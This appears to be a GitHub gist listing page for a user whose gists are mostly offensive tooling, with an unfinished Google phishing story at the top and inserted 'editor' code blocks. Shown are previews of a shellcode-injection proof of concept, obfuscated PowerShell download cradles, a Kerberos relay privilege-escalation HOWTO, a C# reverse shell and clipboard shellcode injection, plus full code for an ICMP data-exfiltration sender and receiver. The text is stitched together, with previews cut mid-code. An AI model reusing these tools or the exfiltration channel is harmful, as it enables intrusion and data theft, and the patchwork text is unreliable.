Unleashed Unleashedmen
g.co, Google's official URL shortcut (update: or Google Workspace's domain verification, see bottom), is compromised. People are actively having their Google accounts stolen.

Someone just tried the most sophisticated phishing attack I've ever seen. I almost fell for it. My mind is a little blown.

  1. Someone named "Chloe" called me from 650-203-0000 with Caller ID saying "Google". She sounded like a real engineer, the connection was super clear, and she had an American accent. Screenshot.

  2. They said that they were from Google Workspace and someone had recently gained access to my account, which they had blocked. They asked me if I had recently logged in from Frankfurt, Germany and I said no.

  3. I asked if they can confirm this is Google calling by emailing me from a Google email and they said sure and sent me this email and told me to look for a case number in it, which I saw in

Unleashedmen / LastCall.c
Created May 9, 2023 22:57
LastCall Injection PoC
// "A process executes until one of the following events occurs:
// - Any thread of the process calls the ExitProcess function.
// - The last thread of the process terminates
// - ..."
// Ref: https://learn.microsoft.com/en-us/windows/win32/procthread/terminating-a-process
//
// --------------------------------------------------------------------------------------------
//
// The idea is to inject shellcode into another process and stomp the instructions of its ExitProcess().
// When the target later calls ExitProcess, the calling thread is redirected into the shellcode instead of exiting.
Unleashedmen / gpt.py
Created February 19, 2023 19:42 — forked from ustayready/gpt.py
CloudGPT - Use ChatGPT to analyze AWS policies for vulnerabilities
import openai
import boto3
import json
import time
from typing import Dict, List
openai.api_key = '### SET YOUR OPENAPI API KEY HERE ###'
session = boto3.session.Session()
client = session.client('iam')
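The gist above hands each policy document to ChatGPT and asks it for vulnerabilities. As an added example (editor's code, not part of ustayready's gist or Unleashedmen's fork), the block below does the same job with deterministic rules instead of a language model: it walks every Allow statement, flags full-admin grants, Allow+NotAction inversions, service-wide wildcards, and a hand-picked list of privilege-escalation primitives (the `PRIVESC_ACTIONS` tuple is this example's own choice, not an exhaustive catalogue). The sample policy documents are constructed for the demo; `analyze_customer_managed_policies` shows how the same check would be fed from boto3 (`list_policies` paginator plus `get_policy_version`) and is not exercised offline.

```python
import fnmatch
import json
import urllib.parse
from typing import Any, Dict, List

# Actions that hand a non-admin principal a well-known path to escalate.
# Illustrative list chosen for this example, not an exhaustive catalogue.
PRIVESC_ACTIONS = (
    "iam:PassRole", "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "iam:AttachUserPolicy", "iam:AttachGroupPolicy", "iam:AttachRolePolicy",
    "iam:PutUserPolicy", "iam:PutGroupPolicy", "iam:PutRolePolicy",
    "iam:CreateAccessKey", "iam:CreateLoginProfile", "iam:UpdateLoginProfile",
    "iam:UpdateAssumeRolePolicy", "sts:AssumeRole",
    "lambda:CreateFunction", "lambda:UpdateFunctionCode", "lambda:InvokeFunction",
    "ec2:RunInstances", "cloudformation:CreateStack", "glue:CreateDevEndpoint",
)


def _as_list(value: Any) -> List[Any]:
    """IAM JSON allows a single string/object or a list for Statement, Action and Resource."""
    if value is None:
        return []
    return [value] if isinstance(value, (str, dict)) else list(value)


def _granted(patterns: List[str], action: str) -> bool:
    """True if any Action entry (case-insensitive, '*' and '?' wildcards) covers `action`."""
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)


def analyze_policy(document: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return one finding per risky Allow statement in a policy document (deterministic rules)."""
    findings: List[Dict[str, Any]] = []
    for idx, stmt in enumerate(_as_list(document.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        conditioned = bool(stmt.get("Condition"))   # a Condition narrows the grant; report, do not drop
        if "NotAction" in stmt:
            findings.append({"statement": idx, "severity": "HIGH", "conditioned": conditioned,
                             "reason": "Allow with NotAction grants everything not listed"})
            continue
        actions = _as_list(stmt.get("Action"))
        any_resource = "*" in _as_list(stmt.get("Resource"))
        if "*" in actions and any_resource:
            findings.append({"statement": idx, "severity": "CRITICAL", "conditioned": conditioned,
                             "reason": "Action * on Resource * (full administrator)"})
            continue
        hits = [a for a in PRIVESC_ACTIONS if _granted(actions, a)]
        if hits:
            findings.append({"statement": idx, "severity": "HIGH" if any_resource else "MEDIUM",
                             "conditioned": conditioned,
                             "reason": "privilege-escalation capable actions: " + ", ".join(hits)})
        wildcards = [a for a in actions if a.endswith(":*")]
        if wildcards and any_resource:
            findings.append({"statement": idx, "severity": "MEDIUM", "conditioned": conditioned,
                             "reason": "service-wide wildcard on Resource *: " + ", ".join(wildcards)})
    return findings


def worst_severity(findings: List[Dict[str, Any]]) -> str:
    order = ["NONE", "MEDIUM", "HIGH", "CRITICAL"]
    return max((f["severity"] for f in findings), key=order.index, default="NONE")


def analyze_customer_managed_policies(iam_client) -> Dict[str, List[Dict[str, Any]]]:
    """Live variant: run analyze_policy over every attached customer-managed policy.
    Uses boto3's list_policies paginator and get_policy_version (needs iam:ListPolicies
    and iam:GetPolicyVersion); not exercised offline."""
    results = {}
    for page in iam_client.get_paginator("list_policies").paginate(Scope="Local", OnlyAttached=True):
        for pol in page["Policies"]:
            doc = iam_client.get_policy_version(
                PolicyArn=pol["Arn"], VersionId=pol["DefaultVersionId"])["PolicyVersion"]["Document"]
            if isinstance(doc, str):                      # boto3 normally returns a dict already
                doc = json.loads(urllib.parse.unquote(doc))
            results[pol["PolicyName"]] = analyze_policy(doc)
    return results


# Constructed sample documents (not real account policies).
SAMPLE_POLICIES = {
    "ReadOnlyBucket": {"Version": "2012-10-17", "Statement": {
        "Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"]}},
    "LambdaDeployer": {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Action": ["lambda:*", "iam:PassRole"], "Resource": "*"}]},
    "LegacyAdmin": {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Action": "*", "Resource": "*"}]},
}

if __name__ == "__main__":
    for name, doc in SAMPLE_POLICIES.items():
        print(name, worst_severity(analyze_policy(doc)))
        for finding in analyze_policy(doc):
            print("   ", finding["severity"], finding["reason"])
```

The rule set is deliberately small; the point is that the dangerous combinations (`lambda:*` plus `iam:PassRole` on `Resource: "*"`, for instance) are mechanical to detect and do not need a model's judgement, which also means no policy text leaves the account.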
Unleashedmen / Download-Cradles-Oneliners.md
Created November 16, 2022 04:26 — forked from mgeeky/Download-Cradles-Oneliners.md
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
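The one-liner above hides `[Convert]::FromBase64String` behind a `GetMethods()` name wildcard (`F*g`) and XORs every decoded byte with 35 before casting to `[char]`. As an added example (editor's code, not from mgeeky's gist), the block below recovers such strings statically: it extracts the base64 literal and the `-bxor` key with regular expressions and decodes them in Python, with the forward direction included so you can build your own test strings. The UTF-16 variant assumes the XOR is applied to the raw UTF-16LE bytes before decoding, the same order the UTF-8 one-liner uses; `ONELINER` is the page's own sample quoted verbatim.

```python
import base64
import re
from typing import Optional, Tuple

# Shape of the cradle above: a base64 literal handed to .Invoke(...) and a "-bxor <key>"
# applied to every decoded byte. Both regexes are this example's assumptions about that shape.
B64_LITERAL_RE = re.compile(r"Invoke\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
BXOR_KEY_RE = re.compile(r"-bxor\s*(\d+)")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Byte-wise XOR with a single-byte key, the same operation as PowerShell's %{$_-bxor N}."""
    return bytes(b ^ (key & 0xFF) for b in data)


def deobfuscate(b64: str, key: int, utf16: bool = False) -> str:
    """Reverse the cradle: FromBase64String, then -bxor key, then bytes to characters.
    The byte-wise variant mirrors [char]$_ (one char per byte, hence latin-1); the UTF-16
    variant assumes the XOR happens before the UTF-16LE decode."""
    raw = xor_bytes(base64.b64decode(b64), key)
    return raw.decode("utf-16-le" if utf16 else "latin-1")


def obfuscate(text: str, key: int, utf16: bool = False) -> str:
    """Forward direction, useful for building samples or confirming how a string was produced."""
    raw = text.encode("utf-16-le" if utf16 else "latin-1")
    return base64.b64encode(xor_bytes(raw, key)).decode("ascii")


def extract_cradle(script: str) -> Optional[Tuple[str, int]]:
    """Pull (base64 literal, xor key) out of a script without executing it; None if either is absent."""
    literal = B64_LITERAL_RE.search(script)
    key = BXOR_KEY_RE.search(script)
    if not literal or not key:
        return None
    return literal.group(1), int(key.group(1))


def recover(script: str, utf16: bool = False) -> Optional[str]:
    """Static recovery: locate the literal and key, then decode."""
    found = extract_cradle(script)
    return deobfuscate(*found, utf16=utf16) if found else None


# The one-liner from the list above, quoted verbatim as the sample input.
ONELINER = ("$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name)"
            ".Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''")

if __name__ == "__main__":
    print(extract_cradle(ONELINER))
    print(recover(ONELINER))
```

Running it on the page's sample yields the key 35 and the plaintext `Ala ma kota`, which is what the PowerShell pipeline would print; the same two regexes are a reasonable starting point for a detection rule on scripts that pair a `-bxor` with a base64 literal.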
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
Unleashedmen / krbrelay_privesc_howto.md
Created May 2, 2022 01:28 — forked from tothi/krbrelay_privesc_howto.md
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
#!/usr/bin/env bash
# sudo apt install hashcat
echo -e "\033[32m"
echo '
_ _ ___
/\/\ ___ __| (_) / _ \__ _ ___ ___
/ \ / _ \ / _` | |/ /_)/ _` / __/ __|
/ /\/\ \ (_) | (_| | / ___/ (_| \__ \__ \
Unleashedmen / icmp_exfiltration.py
Created February 15, 2022 23:43 — forked from maxrodrigo/icmp_exfiltration.py
ICMP Exfiltration
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scapy.all import sniff, ICMP

def process_packet(packet):
    # Only echo replies (ICMP type 0) are treated as carriers; the exfiltrated
    # chunk rides in the last 8 bytes of the echo payload.
    if packet.haslayer(ICMP) and packet[ICMP].type == 0:
        data = packet[ICMP].load[-8:]
        try:
            print(data.decode("utf-8"), end="")   # body completed here; the preview ends after "try:"
        except UnicodeDecodeError:
            pass

sniff(filter="icmp", prn=process_packet)
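The sniffer above shows only the receiving end. As an added example (editor's code, not from maxrodrigo's gist), the block below builds both sides of the channel in plain Python with no scapy or raw sockets, so it runs offline: the sender splits a secret into 8-byte chunks and places each one at the tail of a ping-sized echo-reply payload, and the receiver applies the same filter as the sniffer (echo replies only, last 8 bytes) and reassembles by sequence number. The framing details (identifier 0x1337, NUL padding of the final chunk, 48 filler bytes before the chunk, use of echo replies to match the sniffer's type==0 check) are this example's assumptions, and the secret is a constructed sample.

```python
import struct
from typing import Dict, Iterable, List, Tuple

CHUNK = 8                 # the sniffer reads the last 8 bytes of each echo payload
ICMP_ECHO_REPLY = 0       # the only type the sniffer above accepts
ICMP_ECHO_REQUEST = 8
IDENT = 0x1337            # constructed identifier so the receiver can ignore unrelated pings
FILLER = bytes(range(0x10, 0x10 + 48))   # 48 filler + 8 data bytes = ping's default 56-byte payload


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement sum over the whole ICMP message (checksum field zeroed)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Serialise an ICMP echo message: type, code 0, checksum, identifier, sequence, payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(packet: bytes) -> Tuple[int, int, int, bytes]:
    """Return (type, ident, seq, payload); raise on a short packet or bad checksum."""
    if len(packet) < 8 or icmp_checksum(packet) != 0:   # a valid message re-sums to zero
        raise ValueError("malformed ICMP message")
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return icmp_type, ident, seq, packet[8:]


def exfil_packets(secret: bytes, ident: int = IDENT) -> List[bytes]:
    """Sender side: one echo reply per 8-byte chunk, last chunk NUL-padded
    (assumption: the secret itself has no trailing NUL bytes)."""
    packets = []
    for seq, offset in enumerate(range(0, len(secret), CHUNK), start=1):
        chunk = secret[offset:offset + CHUNK].ljust(CHUNK, b"\x00")
        packets.append(build_icmp(ICMP_ECHO_REPLY, ident, seq, FILLER + chunk))
    return packets


def receive(packets: Iterable[bytes], ident: int = IDENT) -> bytes:
    """Receiver side, mirroring process_packet above: keep echo replies for our identifier,
    take the last 8 payload bytes of each, and reassemble in sequence order."""
    chunks: Dict[int, bytes] = {}
    for packet in packets:
        try:
            icmp_type, pkt_ident, seq, payload = parse_icmp(packet)
        except ValueError:
            continue                                  # not something we can parse: drop silently
        if icmp_type != ICMP_ECHO_REPLY or pkt_ident != ident:
            continue                                  # echo requests and other pings are noise
        chunks[seq] = payload[-CHUNK:]
    return b"".join(chunks[s] for s in sorted(chunks)).rstrip(b"\x00")


# Constructed sample: a 23-byte secret becomes three echo replies; the echo request is a decoy.
SECRET = b"user=admin;pass=hunter2"
DECOY = build_icmp(ICMP_ECHO_REQUEST, IDENT, 99, FILLER + b"NOTDATA!")

if __name__ == "__main__":
    wire = exfil_packets(SECRET) + [DECOY]
    print(len(wire), "messages on the wire")
    print(receive(wire))
```

Because each message carries a normal-looking 56-byte payload and a valid checksum, nothing in the ICMP header distinguishes it from ping traffic; the detection angle is the payload tail changing between replies of the same identifier, which this framing makes easy to spot once you know to look.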
Unleashedmen / ClippyShellcodeInject.cs
Created November 21, 2021 15:39
Clipboard Shellcode Injection
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject
{
Unleashedmen / Simple_Rev_Shell.cs
Created June 11, 2021 21:14
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;